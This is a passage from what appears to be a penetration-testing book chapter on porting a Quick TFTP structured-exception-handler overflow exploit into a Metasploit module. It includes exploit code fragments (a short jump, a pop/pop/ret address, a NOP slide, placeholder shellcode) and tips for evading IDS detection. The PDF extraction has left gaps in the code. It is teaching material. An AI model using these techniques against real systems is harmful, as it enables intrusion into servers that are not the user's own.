background image

Porting Exploits to the Metasploit Framework


sploit = "\x00\x02"

       sploit << "pwnd"
       sploit << "\x00"
       sploit << evil
       sploit << "\x00"



Following the initial string of 


s (1019 of them, represented by 


 in hexa-

decimal), we add a short jump at   to overwrite the Next SE Handler (NSEH). 
At the beginning of this chapter, we used a simple stack overflow example when 
we attacked MailCarrier and overwrote the instruction pointer. Here, we over-
write the SEH and the NSEH to break out of the structured exception handler. 
Then at   we add the address of a 


sequence of instructions to 

overwrite SEH, which puts us into an area of memory that we control.

Next, to make sure that the packet will be recognized as a write request 

by the TFTP server, we append 


 after the shellcode at  . 

Now, when we load the module and run it against our target, our debugger 

should pause with a SEH overwrite, as shown in Figure 15-4.

Figure 15-4: Quick TFTP's initial SEH overwrite

Because that long string of 


s and the NOP slide sent to the application 

will set off IDS alarms, we’ll replace the 


s (as in the previous example) with 

a random selection of uppercase alphabetic characters, and replace the 



characters with NOP equivalents, as shown in the following boldface code:

evil = 


)   # Was: "\x41" * 1019

evil << "\xeb\x08\x90\x90"           # Short Jump
evil << "\x58\x14\xd3\x74"           # pop/pop/ret
evil << 


                # Was: "\x90" * 16  # NOP slide

evil << "\xcc" * 412                 # Dummy Shellcode

As always, it’s a good idea to check your new module’s functionality after 

every change. As you can see in Figure 15-5, the random characters have been 
accepted by the application and SEH is still controlled as it was before.